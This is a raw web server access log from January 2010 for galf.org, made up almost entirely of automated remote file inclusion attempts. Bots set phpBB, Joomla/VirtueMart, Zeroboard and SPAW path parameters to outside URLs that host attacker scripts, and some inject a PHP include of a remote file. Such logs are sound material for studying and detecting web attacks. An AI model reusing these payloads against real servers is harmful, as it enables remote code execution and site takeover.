115.68.3.94 - - [10/Jan/2010:19:14:53 -0800] "GET /logs//index.php?config=1&base_datapath=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [10/Jan/2010:19:14:53 -0800] "GET /logs/access_090928.log%20%20//index.php?config=1&base_datapath=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [10/Jan/2010:19:17:12 -0800] "GET /logs/access_090928.log//index.php?config=1&base_datapath=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.151.70.1 - - [10/Jan/2010:19:23:44 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.earlywarninginc.com/.injek/injek.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.833" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:19:26:33 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:19:26:33 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:19:26:33 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:19:27:18 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:19:27:18 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:19:27:20 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.109.99 - - [10/Jan/2010:19:28:03 -0800] "GET /cendoc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729)" "www.galf.org"
61.108.83.106 - - [10/Jan/2010:19:29:35 -0800] "GET /logs///skin/ggambo7002_board/setup.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.108.83.106 - - [10/Jan/2010:19:29:35 -0800] "GET //skin/ggambo7002_board/setup.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.108.83.106 - - [10/Jan/2010:19:29:35 -0800] "GET /logs/access_091116.log%20%20///skin/ggambo7002_board/setup.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.151.70.1 - - [10/Jan/2010:19:30:24 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.earlywarninginc.com/.injek/injek.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
209.151.70.1 - - [10/Jan/2010:19:30:24 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.earlywarninginc.com/.injek/injek.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.833" "www.galf.org"
209.151.70.1 - - [10/Jan/2010:19:30:24 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.earlywarninginc.com/.injek/injek.txt? HTTP/1.1" 200 4947 "-" "libwww-perl/5.833" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:19:33:15 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
207.191.225.96 - - [10/Jan/2010:19:33:22 -0800] "GET /logs/access.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
207.191.225.96 - - [10/Jan/2010:19:33:22 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
207.191.225.96 - - [10/Jan/2010:19:34:16 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
207.191.225.96 - - [10/Jan/2010:19:34:16 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
207.191.225.96 - - [10/Jan/2010:19:34:18 -0800] "GET /logs/access.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.62.107 - - [10/Jan/2010:19:49:50 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:19:49:50 -0800] "GET /?DOCUMENT_ROOT=http://www.qqe.ru/forum/id1.txt? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:19:49:50 -0800] "GET /logs/access_091207.log%20%20/?DOCUMENT_ROOT=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:19:50:24 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:19:50:25 -0800] "GET /?DOCUMENT_ROOT=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:19:50:25 -0800] "GET /logs/access_091207.log%20%20/?DOCUMENT_ROOT=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:19:51:03 -0800] "GET /logs/access_091123.log%20%20/?DOCUMENT_ROOT=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:19:51:03 -0800] "GET /logs/access_091123.log%20%20/?DOCUMENT_ROOT=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.165.122.122 - - [10/Jan/2010:19:52:47 -0800] "GET /includes/functions_admin.php?phpbb_root_path=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.165.122.122 - - [10/Jan/2010:19:52:47 -0800] "GET /logs/access.log%20%20/includes/functions_admin.php?phpbb_root_path=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.165.122.122 - - [10/Jan/2010:19:52:47 -0800] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.165.122.122 - - [10/Jan/2010:19:53:03 -0800] "GET /logs/access.log%20%20/includes/functions_admin.php?phpbb_root_path=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.165.122.122 - - [10/Jan/2010:19:53:04 -0800] "GET /includes/functions_admin.php?phpbb_root_path=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.165.122.122 - - [10/Jan/2010:19:53:09 -0800] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.165.122.122 - - [10/Jan/2010:19:53:20 -0800] "GET /includes/functions_admin.php?phpbb_root_path=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.165.122.122 - - [10/Jan/2010:19:53:20 -0800] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.165.122.122 - - [10/Jan/2010:19:53:24 -0800] "GET /logs/access.log%20%20/includes/functions_admin.php?phpbb_root_path=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [10/Jan/2010:19:54:10 -0800] "GET /logs/access_090831.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [10/Jan/2010:19:54:10 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [10/Jan/2010:19:54:10 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [10/Jan/2010:19:54:15 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [10/Jan/2010:19:54:15 -0800] "GET /logs/access_090831.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [10/Jan/2010:19:54:15 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [10/Jan/2010:19:56:11 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [10/Jan/2010:19:56:40 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [10/Jan/2010:19:57:56 -0800] "GET /logs/access_090831.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [10/Jan/2010:19:58:57 -0800] "GET /logs/access_090803.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [10/Jan/2010:20:00:07 -0800] "GET /logs/access_090831.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [10/Jan/2010:20:01:12 -0800] "GET /logs/access_090803.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.136.177 - - [10/Jan/2010:20:01:42 -0800] "GET /bbs//skin/zero_vote/login.php?dir=http://www.fileden.com/files/2009/12/18/2693460/ketek?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.136.177 - - [10/Jan/2010:20:01:42 -0800] "GET /logs/access.log//bbs//skin/zero_vote/login.php?dir=http://www.fileden.com/files/2009/12/18/2693460/ketek?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.136.177 - - [10/Jan/2010:20:01:42 -0800] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://www.fileden.com/files/2009/12/18/2693460/ketek?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.136.177 - - [10/Jan/2010:20:01:54 -0800] "GET /logs/access_100104.log//bbs//skin/zero_vote/login.php?dir=http://www.fileden.com/files/2009/12/18/2693460/ketek?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.136.177 - - [10/Jan/2010:20:01:54 -0800] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://www.fileden.com/files/2009/12/18/2693460/ketek?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.136.177 - - [10/Jan/2010:20:01:55 -0800] "GET /bbs//skin/zero_vote/login.php?dir=http://www.fileden.com/files/2009/12/18/2693460/ketek?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:20:05:12 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:20:05:15 -0800] "GET /logs/access_091123.log%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:20:05:15 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:20:06:31 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:20:06:33 -0800] "GET /logs/access_091123.log%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:20:06:33 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.imoralro.com.br/forum/public/style_css/css_2/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.108.83.106 - - [10/Jan/2010:20:08:45 -0800] "GET /logs/access_090831.log/?phpbb_root_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.108.83.106 - - [10/Jan/2010:20:08:45 -0800] "GET /logs/access_090810.log/?phpbb_root_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.108.83.106 - - [10/Jan/2010:20:08:45 -0800] "GET /logs/?phpbb_root_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
61.108.83.106 - - [10/Jan/2010:20:08:45 -0800] "GET /?phpbb_root_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [10/Jan/2010:20:10:24 -0800] "GET /setup.php?dir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [10/Jan/2010:20:10:24 -0800] "GET /logs//setup.php?dir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [10/Jan/2010:20:10:29 -0800] "GET /logs/access_091207.log//setup.php?dir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [10/Jan/2010:20:10:34 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.14.42 - - [10/Jan/2010:20:10:34 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.14.42 - - [10/Jan/2010:20:10:34 -0800] "GET /logs/access.log%20%20//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.14.42 - - [10/Jan/2010:20:10:40 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.14.42 - - [10/Jan/2010:20:10:40 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.14.42 - - [10/Jan/2010:20:10:40 -0800] "GET /logs/access.log%20%20//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.12.13.152 - - [10/Jan/2010:20:10:40 -0800] "GET /logs/access_090928.log//setup.php?dir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [10/Jan/2010:20:11:06 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.14.42 - - [10/Jan/2010:20:11:06 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.14.42 - - [10/Jan/2010:20:11:06 -0800] "GET /logs/access.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.14.42 - - [10/Jan/2010:20:11:31 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.14.42 - - [10/Jan/2010:20:11:31 -0800] "GET /logs/access.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.14.42 - - [10/Jan/2010:20:11:31 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.14.42 - - [10/Jan/2010:20:13:27 -0800] "GET /logs/access_100104.log%20%20//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [10/Jan/2010:20:13:27 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [10/Jan/2010:20:13:27 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [10/Jan/2010:20:13:38 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [10/Jan/2010:20:13:38 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [10/Jan/2010:20:13:39 -0800] "GET /logs/access_100104.log%20%20//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [10/Jan/2010:20:13:52 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [10/Jan/2010:20:13:52 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [10/Jan/2010:20:13:52 -0800] "GET /logs/access_100104.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [10/Jan/2010:20:14:22 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [10/Jan/2010:20:14:22 -0800] "GET /logs/access_100104.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [10/Jan/2010:20:14:22 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.78 - - [10/Jan/2010:20:15:05 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
209.151.70.1 - - [10/Jan/2010:20:15:29 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.earlywarninginc.com/.injek/injek.txt? HTTP/1.1" 200 1050 "-" "libwww-perl/5.833" "www.galf.org"
65.55.207.78 - - [10/Jan/2010:20:17:09 -0800] "GET /cendoc/?D=A HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
217.16.1.22 - - [10/Jan/2010:20:19:53 -0800] "GET /admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.16.1.22 - - [10/Jan/2010:20:19:53 -0800] "GET /logs/admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.16.1.22 - - [10/Jan/2010:20:19:53 -0800] "GET /logs/access_091214.log/admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [10/Jan/2010:20:20:56 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.56.83 - - [10/Jan/2010:20:20:56 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.56.83 - - [10/Jan/2010:20:20:56 -0800] "GET /logs/access.log%20%20//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.56.83 - - [10/Jan/2010:20:21:15 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.56.83 - - [10/Jan/2010:20:21:15 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.56.83 - - [10/Jan/2010:20:21:15 -0800] "GET /logs/access.log%20%20//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
